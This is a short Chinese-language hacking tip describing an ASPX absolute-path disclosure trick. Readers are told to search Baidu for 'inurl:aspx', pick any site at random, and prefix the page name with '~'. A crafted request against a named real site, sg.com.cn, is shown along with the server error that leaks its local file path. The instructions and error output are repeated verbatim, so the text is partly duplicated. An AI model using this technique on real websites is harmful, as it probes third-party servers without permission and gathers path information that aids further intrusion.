aspx暴绝对路径漏洞
aspx暴绝对路径漏洞 意外的发现
baidu.com里扫: inurl:aspx
找到很多ASPX的站.随便进一个.
http://www.sg.com.cn/jpbbs/denglu.aspx 这里吧.
写成这样:http://www.sg.com.cn/jpbbs/~denglu.aspx 回车, 出现错误信息如下:
========错误信息===============
“/jpbbs”应用程序中的服务器错误。
--------------------------------------------------------------------------------
用于监视的文件名无效:“G:\xxf\jpbbs\~denglu.aspx”。用于监视的文件名必须具有绝对路径,并且不包含通配符。
========错误信息===============
呵,绝对路径出来了..
找到很多ASPX的站.随便进一个.
http://www.sg.com.cn/jpbbs/denglu.aspx 这里吧.
写成这样:http://www.sg.com.cn/jpbbs/~denglu.aspx 回车, 出现错误信息如下:
========错误信息===============
“/jpbbs”应用程序中的服务器错误。
--------------------------------------------------------------------------------
用于监视的文件名无效:“G:\xxf\jpbbs\~denglu.aspx”。用于监视的文件名必须具有绝对路径,并且不包含通配符。
========错误信息===============
呵,绝对路径出来了..